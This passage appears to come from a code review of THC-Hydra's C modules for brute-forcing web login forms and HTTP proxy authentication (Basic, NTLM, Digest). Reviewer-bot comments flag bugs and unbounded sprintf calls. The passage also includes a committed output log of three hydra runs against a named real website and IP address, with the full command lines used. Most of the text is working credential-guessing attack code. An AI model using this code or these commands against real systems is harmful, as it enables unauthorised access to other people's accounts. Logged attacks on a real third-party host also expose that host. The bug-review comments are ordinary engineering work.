i = analyze_server_response(s); // ignore result
if (strlen(cookie) > 0) {
sprintf(header, "Cookie: %s\r\n", cookie);
}
hydra_reconnect(s, ip, port, options);
}
if (strcmp(type, "POST") == 0) {
sprintf(buffer,
"POST http://%s:%d%.600s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Hydra)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n%s%s\r\n%s",
webtarget, webport, url, webtarget, (int) strlen(upd3variables), header, cuserheader, upd3variables);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
} else {
sprintf(buffer, "GET http://%s:%d%.600s?%s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Hydra)\r\n%s%s\r\n", webtarget, webport, url, upd3variables, webtarget,
header, cuserheader);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
}
} else {
// direct web server, no proxy
if (getcookie) {
//doing a GET to save cookies
sprintf(buffer, "GET %.600s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Hydra)\r\n%s\r\n", cookieurl, webtarget, cuserheader);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
i = analyze_server_response(s); // ignore result
if (strlen(cookie) > 0) {
sprintf(header, "Cookie: %s\r\n", cookie);
}
hydra_reconnect(s, ip, port, options);
}
if (strcmp(type, "POST") == 0) {
sprintf(buffer,
"POST %.600s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Hydra)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n%s%s\r\n%s",
url, webtarget, (int) strlen(upd3variables), header, cuserheader, upd3variables);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
} else {
sprintf(buffer, "GET %.600s?%s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Hydra)\r\n%s%s\r\n", url, upd3variables, webtarget, header, cuserheader);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
}
}
}
found = analyze_server_response(s);
if (auth_flag) { // we received a 401 error - user using wrong module
hydra_report(stderr, "[ERROR] the target is using HTTP auth, not a web form, received HTTP error code 401. Use module \"http%s-get\" instead.\n",
(options & OPTION_SSL) > 0 ? "s" : "");
return 4;
}
if (strlen(cookie) > 0) {
sprintf(header, "Cookie: %.1000s\r\n", cookie);
}
//if page was redirected, follow the location header
redirected_cpt = MAX_REDIRECT;
if (debug)
printf("[DEBUG] attempt result: found %d, redirect %d, location: %s\n", found, redirected_flag, redirected_url_buff);
while (found == 0 && redirected_flag && (redirected_url_buff[0] != 0) && (redirected_cpt > 0)) {
//we have to split the location
char *startloc, *endloc;
char str[2048];
char str2[2048];
char str3[2048];
redirected_cpt--;
redirected_flag = 0;
//check if the redirect page contains the fail/success condition
#ifdef HAVE_PCRE
if (hydra_string_match(redirected_url_buff, cond) == 1) {
#else
if (strstr(redirected_url_buff, cond) != NULL) {
#endif
found = success_cond;
} else {
//location could be either absolute http(s):// or / something
//or relative
startloc = strstr(redirected_url_buff, "://");
if (startloc != NULL) {
startloc += strlen("://");
if ((endloc = strchr(startloc, '\r')) != NULL) {
startloc[endloc - startloc] = 0;
}
if ((endloc = strchr(startloc, '\n')) != NULL) {
startloc[endloc - startloc] = 0;
}
strcpy(str, startloc);
endloc = strchr(str, '/');
if (endloc != NULL) {
strncpy(str2, str, endloc - str);
str2[endloc - str] = 0;
} else
strncpy(str2, str, sizeof(str));
if (strlen(str) - strlen(str2) == 0) {
strcpy(str3, "/");
} else {
strncpy(str3, str + strlen(str2), strlen(str) - strlen(str2) - 1);
str3[strlen(str) - strlen(str2) - 1] = 0;
}
} else {
strncpy(str2, webtarget, sizeof(str2));
if (redirected_url_buff[0] != '/') {
//it's a relative path, so we have to concatenate it
//with the path from the first url given
char *urlpath;
char urlpath_extracted[2048];
memset(urlpath_extracted, 0, sizeof(urlpath_extracted));
urlpath = strrchr(url, '/');
if (urlpath != NULL) {
strncpy(urlpath_extracted, url, urlpath - url);
sprintf(str3, "%.1000s/%.1000s", urlpath_extracted, redirected_url_buff);
} else {
sprintf(str3, "%.1000s/%.1000s", url, redirected_url_buff);
}
} else
strncpy(str3, redirected_url_buff, sizeof(str3));
if (debug)
hydra_report(stderr, "[DEBUG] host=%s redirect=%s origin=%s\n", str2, str3, url);
}
if (str3[0] != '/') {
j = strlen(str3);
str3[j + 1] = 0;
for (i = j; i > 0; i--)
str3[i] = str3[i - 1];
str3[0] = '/';
}
if (verbose)
hydra_report(stderr, "[VERBOSE] Page redirected to http://%s%s\n", str2, str3);
//re-use the code above to check for proxy use
if (use_proxy == 1 && proxy_authentication != NULL) {
// proxy with authentication
sprintf(buffer, "GET http://%s:%d%.600s HTTP/1.0\r\nHost: %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n",
webtarget, webport, str3, str2, proxy_authentication, header);
} else {
if (use_proxy == 1) {
// proxy without authentication
sprintf(buffer, "GET http://%s:%d%.600s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", webtarget, webport, str3, str2, header);
} else {
//direct web server, no proxy
sprintf(buffer, "GET %.600s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", str3, str2, header);
}
}
hydra_reconnect(s, ip, port, options);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
found = analyze_server_response(s);
if (strlen(cookie) > 0) {
sprintf(header, "Cookie: %s\r\n", cookie);
}
}
}
//if the last status is still 3xx, set it as a false
if (found != -1 && found == success_cond && redirected_flag == 0 && redirected_cpt >= 0) {
hydra_report_found_host(port, ip, "www-form", fp);
hydra_completed_pair_found();
} else {
hydra_completed_pair();
}
return 1;
}
void service_http_form(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port, char *type) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_HTTP, mysslport = PORT_HTTP_SSL;
char *ptr, *ptr2;
hydra_register_socket(sp);
if (webtarget != NULL && (webtarget = strstr(miscptr, "://")) != NULL) {
webtarget += strlen("://");
if ((ptr2 = index(webtarget, ':')) != NULL) { /* step over port if present */
*ptr2 = 0;
ptr2++;
ptr = ptr2;
if (*ptr == '/' || (ptr = index(ptr2, '/')) != NULL)
miscptr = ptr;
else
miscptr = slash; /* to make things easier to user */
} else if ((ptr2 = index(webtarget, '/')) != NULL) {
if (freemischttpform == 0) {
freemischttpform = 1;
miscptr = malloc(strlen(ptr2) + 1);
strcpy(miscptr, ptr2);
*ptr2 = 0;
}
} else
webtarget = NULL;
}
if (cmdlinetarget != NULL && webtarget == NULL)
webtarget = cmdlinetarget;
else if (webtarget == NULL && cmdlinetarget == NULL)
webtarget = hydra_address2string(ip);
if (port != 0)
webport = port;
else if ((options & OPTION_SSL) == 0)
webport = myport;
else
webport = mysslport;
sprintf(bufferurl, "%.1000s", miscptr);
url = bufferurl;
ptr = url;
while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\'))
ptr++;
if (*ptr != 0)
*ptr++ = 0;
variables = ptr;
while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\'))
ptr++;
if (*ptr != 0)
*ptr++ = 0;
cond = ptr;
while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\'))
ptr++;
if (*ptr != 0)
*ptr++ = 0;
optional1 = ptr;
if (strstr(url, "\\:") != NULL) {
if ((ptr = malloc(strlen(url))) != NULL) { // no need for +1
strcpy(ptr, hydra_strrep(url, "\\:", ":"));
url = ptr;
}
}
if (strstr(variables, "\\:") != NULL) {
if ((ptr = malloc(strlen(variables))) != NULL) { // no need for +1
strcpy(ptr, hydra_strrep(variables, "\\:", ":"));
variables = ptr;
}
}
if (strstr(cond, "\\:") != NULL) {
if ((ptr = malloc(strlen(cond))) != NULL) { // no need for +1
strcpy(ptr, hydra_strrep(cond, "\\:", ":"));
cond = ptr;
}
}
if (url == NULL || variables == NULL || cond == NULL /*|| optional1 == NULL */ )
hydra_child_exit(2);
//printf("url: %s, var: %s, cond: %s, opt: %s\n", url, variables, cond, optional1);
if (*cond == 0) {
fprintf(stderr, "[ERROR] invalid number of parameters in module option\n");
hydra_child_exit(2);
}
sprintf(cookieurl, "%.1000s", url);
//conditions now have to contain F or S to set the fail or success condition
if (*cond != 0 && (strpos(cond, "F=") == 0)) {
success_cond = 0;
cond += 2;
} else if (*cond != 0 && (strpos(cond, "S=") == 0)) {
success_cond = 1;
cond += 2;
} else {
//by default condition is a fail
success_cond = 0;
}
while ( /*(optional1 = strtok(NULL, ":")) != NULL */ *optional1 != 0) {
switch (optional1[0]) {
case 'c': // fall through
case 'C':
ptr = optional1 + 2;
while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\'))
ptr++;
if (*ptr != 0)
*ptr++ = 0;
sprintf(cookieurl, "%.1000s", hydra_strrep(optional1 + 2, "\\:", ":"));
optional1 = ptr;
break;
case 'h': // fall through
case 'H':
ptr = optional1 + 2;
while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\'))
ptr++;
if (*ptr != 0)
*ptr++ = 0;
ptr2 = ptr;
while (*ptr2 != 0 && (*ptr2 != ':' || *(ptr2 - 1) == '\\'))
ptr2++;
if (*ptr2 != 0)
*ptr2++ = 0;
if (sizeof(userheader) - strlen(userheader) > 4) {
strncat(userheader, optional1 + 2, sizeof(userheader) - strlen(userheader) - 4);
strcat(userheader, ":");
strncat(userheader, hydra_strrep(ptr, "\\:", ":"), sizeof(userheader) - strlen(userheader) - 3);
strcat(userheader, "\r\n");
}
optional1 = ptr2;
break;
// no default
}
}
while (1) {
if (run == 2) {
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {
if (freemischttpform)
free(miscptr);
freemischttpform = 0;
hydra_child_exit(1);
}
}
switch (run) {
case 1: /* connect and service init function */
{
if (sock >= 0)
sock = hydra_disconnect(sock);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
if (freemischttpform)
free(miscptr);
freemischttpform = 0;
hydra_child_exit(1);
}
next_run = 2;
break;
}
case 2: /* run the cracking function */
next_run = start_http_form(sock, ip, port, options, miscptr, fp, type);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
if (freemischttpform)
free(miscptr);
freemischttpform = 0;
hydra_child_exit(0);
break;
case 4: /* silent error exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
if (freemischttpform)
free(miscptr);
freemischttpform = 0;
hydra_child_exit(1);
break;
default:
if (freemischttpform)
free(miscptr);
freemischttpform = 0;
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
if (freemischttpform)
free(miscptr);
}
void service_http_get_form(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_http_form(ip, sp, options, miscptr, fp, port, "GET");
}
void service_http_post_form(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_http_form(ip, sp, options, miscptr, fp, port, "POST");
}
int service_http_form_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
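
Review bot: In html_encode() the '#' branch calls `hydra_strrep(ret, "&", "%23")`, so it searches for '&' (already rewritten to %26 one step earlier) and a '#' in a login or password goes out unencoded; the search string should be "#". hydra_reconnect() takes `int s` by value, so the descriptor returned by hydra_connect_tcp() or hydra_connect_ssl() never reaches start_http_form(), which then calls hydra_send() on the old `s`; return the new socket or take an `int *`. In service_http_form() the `*(ptr - 1) == '\\'` test reads one byte before bufferurl when the module option begins with ':'. The "buffer cant overflow" comment also deserves a second look: the sprintf() calls into buffer[9000] take webtarget, proxy_authentication and upd3variables with no length limit, so snprintf() with sizeof(buffer) would be the safer call.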

30
hydra-http-post-attack.txt Executable file

@ -0,0 +1,30 @@
# Hydra v7.4 run at 2012-09-23 14:49:45 on pualounge.de http-post-form (hydra -l foo -P passwords.txt -t 10 -o hydra-http-post-attack.txt -w 0 pualounge.de http-post-form /login.php:login=^USER^&password=^PASS^:Access denied[80][www-form] host: 85.214.74.73 login: foo password: 5
[80][www-form] host: 85.214.74.73 login: foo password: 9
[80][www-form] host: 85.214.74.73 login: foo password: 2
[80][www-form] host: 85.214.74.73 login: foo password: 6
[80][www-form] host: 85.214.74.73 login: foo password: 3
[80][www-form] host: 85.214.74.73 login: foo password: 1
[80][www-form] host: 85.214.74.73 login: foo password: 8
[80][www-form] host: 85.214.74.73 login: foo password: 7
[80][www-form] host: 85.214.74.73 login: foo password: 4
[80][www-form] host: 85.214.74.73 login: foo password: 10
# Hydra v7.4 run at 2012-09-23 14:50:25 on pualounge.de http-post-form (hydra -V -l foo -P passwords.txt -t 10 -o hydra-http-post-attack.txt -w 0 pualounge.de http-post-form /login.php:login=^USER^&password=^PASS^:Access denied[80][www-form] host: 85.214.74.73 login: foo password: 2
[80][www-form] host: 85.214.74.73 login: foo password: 1
[80][www-form] host: 85.214.74.73 login: foo password: 3
[80][www-form] host: 85.214.74.73 login: foo password: 4
[80][www-form] host: 85.214.74.73 login: foo password: 5
[80][www-form] host: 85.214.74.73 login: foo password: 7
[80][www-form] host: 85.214.74.73 login: foo password: 6
[80][www-form] host: 85.214.74.73 login: foo password: 8
[80][www-form] host: 85.214.74.73 login: foo password: 9
[80][www-form] host: 85.214.74.73 login: foo password: 10
# Hydra v7.4 run at 2012-09-23 14:50:33 on pualounge.de http-post-form (hydra -V -l foo -P passwords.txt -t 10 -o hydra-http-post-attack.txt -w 0 pualounge.de http-post-form /login.php:login=^USER^&password=^PASS^:Access denied[80][www-form] host: 85.214.74.73 login: foo password: 3
[80][www-form] host: 85.214.74.73 login: foo password: 1
[80][www-form] host: 85.214.74.73 login: foo password: 4
[80][www-form] host: 85.214.74.73 login: foo password: 2
[80][www-form] host: 85.214.74.73 login: foo password: 5
[80][www-form] host: 85.214.74.73 login: foo password: 7
[80][www-form] host: 85.214.74.73 login: foo password: 8
[80][www-form] host: 85.214.74.73 login: foo password: 9
[80][www-form] host: 85.214.74.73 login: foo password: 6
[80][www-form] host: 85.214.74.73 login: foo password: 10
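
Review bot: This file is the `-o hydra-http-post-attack.txt` output of three hydra v7.4 runs from 2012-09-23, not source, and it records the target hostname and IP address; it should be dropped from the commit and the name added to the ignore list. The content is also worth reading as a bug report: every candidate from 1 to 10 is listed as a valid password for login foo in all three runs, which means the `Access denied` fail string was never seen in the responses and each attempt was counted as a success.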

288
hydra-http-proxy-urlenum.c Normal file

@ -0,0 +1,288 @@
#include "hydra-mod.h"
#include "sasl.h"
extern char *HYDRA_EXIT;
char *buf;
static int http_proxy_auth_mechanism = AUTH_ERROR;
int start_http_proxy_urlenum(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[500], buffer2[500], mlogin[260], mpass[260], mhost[260];
char url[260], host[30];
char *header = ""; /* XXX TODO */
char *ptr;
int auth = 0;
login = hydra_get_next_login();
if (login == NULL || strlen(login) == 0 || strstr(login, "://") == NULL) {
hydra_completed_pair();
return 1;
}
pass = hydra_get_next_password();
pass = empty; // ignored
strncpy(url, login, sizeof(url) - 1);
url[sizeof(url) - 1] = 0;
ptr = strstr(login, "://") + 3;
if (ptr[0] == '[')
ptr++;
strncpy(mhost, ptr, sizeof(mhost) - 1);
mhost[sizeof(mhost) - 1] = 0;
if ((ptr = index(mhost, '/')) != NULL)
*ptr = 0;
if ((ptr = index(mhost, ']')) != NULL)
*ptr = 0;
else if ((ptr = index(mhost, ':')) != NULL)
*ptr = 0;
if (miscptr != NULL && index(miscptr, ':') != NULL) {
strncpy(mlogin, miscptr, sizeof(mlogin) - 1);
mlogin[sizeof(mlogin) - 1] = 0;
ptr = index(mlogin, ':');
*ptr++ = 0;
strncpy(mpass, ptr, sizeof(mpass) - 1);
mpass[sizeof(mpass) - 1] = 0;
auth = 1;
}
if (http_proxy_auth_mechanism == AUTH_ERROR) {
//send dummy request
sprintf(buffer, "GET %s HTTP/1.0\r\n%sUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", url, mhost, header);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive first 40x
buf = hydra_receive_line(s);
while (buf != NULL && strstr(buf, "HTTP/") == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
if (debug)
hydra_report(stderr, "S:%s\n", buf);
//after the first query we should have been disconnected from web server
s = hydra_disconnect(s);
if ((options & OPTION_SSL) == 0) {
s = hydra_connect_tcp(ip, port);
} else {
s = hydra_connect_ssl(ip, port);
}
}
if (auth) {
if (hydra_strcasestr(buf, "Proxy-Authenticate: Basic") != NULL) {
http_proxy_auth_mechanism = AUTH_BASIC;
sprintf(buffer2, "%.50s:%.50s", login, pass);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "GET %s HTTP/1.0\r\n%sProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", url, host, buffer2, header);
if (debug)
hydra_report(stderr, "C:%s\n", buffer);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
buf = hydra_receive_line(s);
while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
//if server cut the connection, just exit cleanly or
//this will be an infinite loop
if (buf == NULL) {
if (verbose)
hydra_report(stderr, "[ERROR] Server did not answer\n");
return 3;
}
if (debug)
hydra_report(stderr, "S:%s\n", buf);
} else {
if (hydra_strcasestr(buf, "Proxy-Authenticate: NTLM") != NULL) {
unsigned char buf1[4096];
unsigned char buf2[4096];
char *pos = NULL;
http_proxy_auth_mechanism = AUTH_NTLM;
//send auth and receive challenge
//send auth request: let the server send it's own hostname and domainname
buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2));
/* to be portable, no snprintf, buffer is big enough so it cant overflow */
//send the first..
sprintf(buffer, "GET %s HTTP/1.0\r\n%sProxy-Authorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nProxy-Connection: keep-alive\r\n%s\r\n", url, host, buf1,
header);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive challenge
buf = hydra_receive_line(s);
while (buf != NULL && (pos = hydra_strcasestr(buf, "Proxy-Authenticate: NTLM ")) == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
if (pos != NULL) {
char *str;
pos += 25;
if ((str = strchr(pos, '\r')) != NULL) {
pos[str - pos] = 0;
}
if ((str = strchr(pos, '\n')) != NULL) {
pos[str - pos] = 0;
}
}
//recover challenge
if (buf != NULL) {
from64tobits((char *) buf1, pos);
free(buf);
}
//Send response
buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2));
sprintf(buffer, "GET %s HTTP/1.0\r\n%sProxy-Authorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nProxy-Connection: keep-alive\r\n%s\r\n", url, host, buf1,
header);
if (debug)
hydra_report(stderr, "C:%s\n", buffer);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
buf = hydra_receive_line(s);
while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
if (buf == NULL)
return 1;
} else {
#ifdef LIBOPENSSL
if (hydra_strcasestr(buf, "Proxy-Authenticate: Digest") != NULL) {
char *pbuffer;
http_proxy_auth_mechanism = AUTH_DIGESTMD5;
pbuffer = hydra_strcasestr(buf, "Proxy-Authenticate: Digest ");
strncpy(buffer, pbuffer + strlen("Proxy-Authenticate: Digest "), sizeof(buffer));
buffer[sizeof(buffer) - 1] = '\0';
sasl_digest_md5(buffer2, login, pass, buffer, miscptr, "proxy", host, 0, header);
if (buffer2 == NULL)
return 3;
if (debug)
hydra_report(stderr, "C:%s\n", buffer2);
if (hydra_send(s, buffer2, strlen(buffer2), 0) < 0)
return 1;
buf = hydra_receive_line(s);
while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
if (debug && buf != NULL)
hydra_report(stderr, "S:%s\n", buf);
if (buf == NULL)
return 1;
} else
#endif
{
if (buf != NULL) {
buf[strlen(buf) - 1] = '\0';
hydra_report(stderr, "Unsupported Auth type:\n%s\n", buf);
} else {
hydra_report(stderr, "Unsupported Auth type\n");
}
return 3;
}
}
}
}
// result analysis
ptr = ((char *) index(buf, ' ')) + 1;
if (*ptr == '2' || (*ptr == '3' && (*(ptr + 2) == '1' || *(ptr + 2) == '2')) || strncmp(ptr, "404", 4) == 0 || strncmp(ptr, "403", 4) == 0) {
hydra_report_found_host(port, ip, "http-proxy", fp);
if (fp != stdout)
fprintf(fp, "[%d][http-proxy-urlenum] host: %s url: %s\n", port, hydra_address2string(ip), url);
printf("[%d][http-proxy-urlenum] host: %s url: %s\n", port, hydra_address2string(ip), url);
hydra_completed_pair_found();
} else {
if (strncmp(ptr, "407", 3) == 0 /*|| strncmp(ptr, "401", 3) == 0 */ ) {
hydra_report(stderr, "[ERROR] Proxy reports bad credentials!\n");
return 3;
}
hydra_completed_pair();
}
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_http_proxy_urlenum(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_HTTP_PROXY, mysslport = PORT_HTTP_PROXY_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
{
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
}
case 2: /* run the cracking function */
next_run = start_http_proxy_urlenum(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_http_proxy_urlenum_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
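
Review bot: In the result analysis of start_http_proxy_urlenum, `strncmp(ptr, "404", 4)` and `strncmp(ptr, "403", 4)` compare four bytes, so the literal's terminating NUL is compared against the character that follows the status code (normally a space) and neither test can match a real status line. Use a length of 3, as the 407 check a few lines below already does. Two further points in the same function: the proxy credentials parsed from miscptr into mlogin and mpass are never used in the lines shown, since the Basic, NTLM and Digest branches all build the Proxy-Authorization value from login and pass, and login is the URL being enumerated. Also, the receive loop after the dummy request can end with buf == NULL, yet buf is then passed to hydra_report with %s, to hydra_strcasestr and finally to index(buf, ' ') with no check; return early when buf is NULL, and test the index() result before adding 1.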

270
hydra-http-proxy.c Normal file
View file

@ -0,0 +1,270 @@
#include "hydra-mod.h"
#include "sasl.h"
extern char *HYDRA_EXIT;
char *buf;
static int http_proxy_auth_mechanism = AUTH_ERROR;
int start_http_proxy(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[500], buffer2[500];
char url[210], host[30];
char *header = ""; /* XXX TODO */
char *ptr;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
if (miscptr == NULL) {
strcpy(url, "http://www.microsoft.com/");
strcpy(host, "Host: www.microsoft.com\r\n");
} else {
sprintf(url, "%.200s", miscptr);
ptr = strstr(miscptr, "://"); // :// check is in hydra.c
sprintf(host, "Host: %.200s", ptr + 3);
if ((ptr = index(host, '/')) != NULL)
*ptr = 0;
if ((ptr = index(host + 6, ':')) != NULL && host[0] != '[')
*ptr = 0;
strcat(host, "\r\n");
}
if (http_proxy_auth_mechanism == AUTH_ERROR) {
//send dummy request
sprintf(buffer, "GET %s HTTP/1.0\r\n%sUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", url, host, header);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive first 40x
buf = hydra_receive_line(s);
while (buf != NULL && strstr(buf, "HTTP/") == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
if (debug)
hydra_report(stderr, "S:%s\n", buf);
//after the first query we should have been disconnected from web server
s = hydra_disconnect(s);
if ((options & OPTION_SSL) == 0) {
s = hydra_connect_tcp(ip, port);
} else {
s = hydra_connect_ssl(ip, port);
}
}
if (hydra_strcasestr(buf, "Proxy-Authenticate: Basic") != NULL) {
http_proxy_auth_mechanism = AUTH_BASIC;
sprintf(buffer2, "%.50s:%.50s", login, pass);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "GET %s HTTP/1.0\r\n%sProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\n%s\r\n", url, host, buffer2, header);
if (debug)
hydra_report(stderr, "C:%s\n", buffer);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
buf = hydra_receive_line(s);
while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
//if server cut the connection, just exit cleanly or
//this will be an infinite loop
if (buf == NULL) {
if (verbose)
hydra_report(stderr, "[ERROR] Server did not answer\n");
return 3;
}
if (debug)
hydra_report(stderr, "S:%s\n", buf);
} else {
if (hydra_strcasestr(buf, "Proxy-Authenticate: NTLM") != NULL) {
unsigned char buf1[4096];
unsigned char buf2[4096];
char *pos = NULL;
http_proxy_auth_mechanism = AUTH_NTLM;
//send auth and receive challenge
//send auth request: let the server send it's own hostname and domainname
buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2));
/* to be portable, no snprintf, buffer is big enough so it cant overflow */
//send the first..
sprintf(buffer, "GET %s HTTP/1.0\r\n%sProxy-Authorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nProxy-Connection: keep-alive\r\n%s\r\n", url, host, buf1, header);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive challenge
buf = hydra_receive_line(s);
while (buf != NULL && (pos = hydra_strcasestr(buf, "Proxy-Authenticate: NTLM ")) == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
if (pos != NULL) {
char *str;
pos += 25;
if ((str = strchr(pos, '\r')) != NULL) {
pos[str - pos] = 0;
}
if ((str = strchr(pos, '\n')) != NULL) {
pos[str - pos] = 0;
}
}
//recover challenge
if (buf != NULL) {
from64tobits((char *) buf1, pos);
free(buf);
}
//Send response
buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2));
sprintf(buffer, "GET %s HTTP/1.0\r\n%sProxy-Authorization: NTLM %s\r\nUser-Agent: Mozilla/4.0 (Hydra)\r\nProxy-Connection: keep-alive\r\n%s\r\n", url, host, buf1, header);
if (debug)
hydra_report(stderr, "C:%s\n", buffer);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
buf = hydra_receive_line(s);
while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
if (buf == NULL)
return 1;
} else {
#ifdef LIBOPENSSL
if (hydra_strcasestr(buf, "Proxy-Authenticate: Digest") != NULL) {
char *pbuffer;
http_proxy_auth_mechanism = AUTH_DIGESTMD5;
pbuffer = hydra_strcasestr(buf, "Proxy-Authenticate: Digest ");
strncpy(buffer, pbuffer + strlen("Proxy-Authenticate: Digest "), sizeof(buffer));
buffer[sizeof(buffer) - 1] = '\0';
sasl_digest_md5(buffer2, login, pass, buffer, miscptr, "proxy", host, 0, header);
if (buffer2 == NULL)
return 3;
if (debug)
hydra_report(stderr, "C:%s\n", buffer2);
if (hydra_send(s, buffer2, strlen(buffer2), 0) < 0)
return 1;
buf = hydra_receive_line(s);
while (buf != NULL && strstr(buf, "HTTP/1.") == NULL) {
free(buf);
buf = hydra_receive_line(s);
}
if (debug && buf != NULL)
hydra_report(stderr, "S:%s\n", buf);
if (buf == NULL)
